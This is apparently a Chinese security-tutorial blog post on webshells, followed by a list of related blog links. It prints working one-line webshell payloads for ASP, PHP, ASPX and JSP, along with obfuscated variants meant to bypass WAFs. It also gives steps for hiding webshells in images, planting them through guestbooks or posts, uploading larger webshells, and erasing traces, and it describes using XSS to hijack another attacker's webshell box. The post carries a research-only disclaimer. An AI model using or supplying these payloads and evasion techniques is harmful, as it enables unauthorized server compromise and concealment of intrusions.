提示：本文所讨论的技术仅用于研究学习，旨在提高大家信息安全意识，任何人不得将其用于非法目的。

@木马及木马后门的讲解，webshell箱子溯源追踪

一：webshell制作原理

webshell:即web网站后门 getshell:是指拿webshell的过程

1.webshell的种类

一句话木马
小马
大马
打包马
脱裤马

2.一句话木马:

介绍：一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。

这是一个一句话木马，我们把它插入到asp的网页中，然后用菜刀链接一下就可以
<%execute request("value")%>
X.asp
xxxx.com/X.asp?value=assdadasad

工作原理：
黑客在注册信息的电子邮箱或者个人主页等中插入类似的如下代码：

<%execute request("value")%>

其中value是值，所以你可以更改自己的值，前面的request就是获取这个值
<%eval request(“value”)%>(现在比较多见，而且字符少，对表单字数有限制的地方特别的实用)
当知道了1数据库的URL，就可以利用本地一张网页进行连接得到webshell。（不知道数据库也可以，只要知道<%eval request(value)%>这个文件被插入到哪一个ASP文件里面就可以了）
这就被称作一句话木马，它是基于B/S结构的。

3.常见写法

asp一句话木马：
<%eval request("c")%>

php一句话木马：
<?php @eval($_POST[value])?>

aspx一句话木马：
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>

jsp一句话：
< % if(request.getParametere("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")))write(request.getParameter("t").getBytes());% >

4.一句话木马变形记

让一句话木马变形绕过 WAF：
WAF通常会以关键字判断是否为一句话木马，所以要将一句话木马变形使用，从而绕过 waf。
后期我还会用大量篇幅来具体的讲解一下木马的制作。

<?php $_REQUEST['a']($_REQUEST['b'])?>
<%Eval(Request(chr(112)))%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("xindong"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%a=request("gold")%><%eval a%>

5.一句话图片马的制作

C32下做一句话
打开C32,把图片放里面，写入一句话保存，退出

我们在制作图片马的时候，也可以同时添加asp,php等其他脚本的木马，这样就拥有了两用的木马。
制作图片马时，要尽量找网站素材图片，这些图片管理员看到也不敢乱删

6.常见的一句话客户端：

中国菜刀
冰蝎
蚁剑

这些都是常见的一句话客户端，不过要小心一下后门。

7.小马

小马体积小，容易隐蔽，隐蔽性强，最重要在于与图片结合一起，上传之后可以利用nginx或者IIS6的解析漏洞来运行，不过功能少，一般只有上传等功能，通常用小马上传大马，然后利用大马进行复杂操作后，再删除大马，在渗透过程中要尽量擦除自己留下的痕迹。

8.大马

大马体积比较大，一般50K以上。功能也多，一般都包括提权命令，磁盘管理，数据库连接接口，执行命令甚至有些具备自带提权功能和压缩，解压缩网站程序的功能。这种马隐蔽性不好，而大多如不加密的话很多杀毒厂商开始追杀此类程序。

二：webshell使用技巧

1.一句话的使用：

首先，找到数据库是asp格式的网站，然后，以留言板，或者发表文章的方式，把一句话添加到asp数据库，或者加进asp网页。
记住！我们的目的是把一句话<%execute request(“value”)%>添加到数据库，无论任何方式。
然后打开客户端（就是你电脑上面的那个html文件），填上加入了一句话的asp文件，或者asp网页，然后进入此网站服务器。

2.小马的使用

主要用来上传大马，然后利用大马进行复杂操作后，再删除大马，在渗透过程中要尽量擦除自己留下的痕迹。
下面让我们参观一个小马：

3.大马的使用

用途
提权
打包
脱裤
增删文件

下面让我们看一下大马的情况：

这就是一个大马的界面，大马具有很多的功能，对于后渗透操作将非常有帮助。

4.使用技巧

内容编码
配合解析漏洞
配合文件包含
利用文件名溢出

三：webshell黑吃黑

1.找shell后门

查找后门
查找webshell后门
找到后门地址
反搞webshell箱子

2.找一句话客户端后门

查找客户端程序后门
反搞webshell箱子

3.实验

下面让我们通过一个实验感受一下"webshell黑吃黑"的过程吧：
假设我们已经在某企业网站上种植了我们从别人手中购买的木马。
通过分析发现了如下后门

然后我们再分析一下木马b.asp的文件，果然证实了上面的想法。

面对这种情况，我们该怎么办呢？
别慌！让我们通过XSS来反搞一下。

当然还有cookie信息，有了这些东西我们就能登录这个webshell箱子了

此时，表示我们已经成功的打掉了另一个黑客的阴谋。
你以为我在第一层，不，我在大气层。

网络安全学习--014--木马及木马后门的讲解，webshell箱子溯源追踪相关推荐

WebShell后门检测与WebShell箱子反杀
今天继续给大家介绍渗透测试相关知识,本文主要内容是WebShell后门检测与WebShell箱子反杀. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果 ...
木马常用的后门技术讲解
菜鸟必须了解的三种后门技术安全知识2009年02月18日星期三 10:21 P.M.菜鸟必须了解的三种后门技术安全知识曾经饱受木马.后门(以下统称后门)侵害的人们都不会忘记机器被破坏后的惨象,于是人 ...
网络安全学习篇28_阶段一小结篇_木马的原理及木马防范
上一篇博客:网络安全学习篇27_阶段一小结篇_DNS欺骗与钓鱼网站的防范写在前面: 刚开始接触了一些关键词如渗透,sql注入,靶场等就发现对此方面挺感兴趣,毕竟有的人大大小小都有一个黑客梦,恰巧在 ...
[网络安全学习篇60]：文件上传
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
网络安全学习2个月，感觉什么都不会？
网络安全学习2个月,感觉什么都不会? 学了2个月网络安全,感觉没怎么入门,不知道自己学习的效果怎样. 其实,有这种感受的同学很多,原因也比较多,有基础差入门慢的,有盲目学习的,也有光学不练的-- 但总 ...
漫谈网络安全学习路线：路漫漫其修远兮，吾将上下而求索。
目录开篇小叙: 1.黑客(网络安全)入门必备 1.1 首先,黑客需要有「正直善良的价值观」. 1.2 其次,黑客需要有「科学合理的方法论」. 1.3 因此,「持续有效的执行力」也是黑客必备的能力. ...
来，肝了这份网络安全学习计划无敌
##背景随着互联网的普及,使用网络.上网的人越来越多,网络安全显得越来越重要.党高度重视网络安全,作出一系列重大决策部署,提出了"没有网络安全就没有国家安全"的要求,推动互联网安全 ...
网络安全学习笔记（一）
1.0总览学习了解kali系统等网络安全的基本知识. 1.1什么是网络安全入侵步骤 **阶段一:搜索** 1.互联网搜索 2.社会工程学 3.垃圾数据搜寻 4.域名信息收集注 ...
[网络安全学习篇58]：PHP代码注入
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...

网络安全学习--014--木马及木马后门的讲解，webshell箱子溯源追踪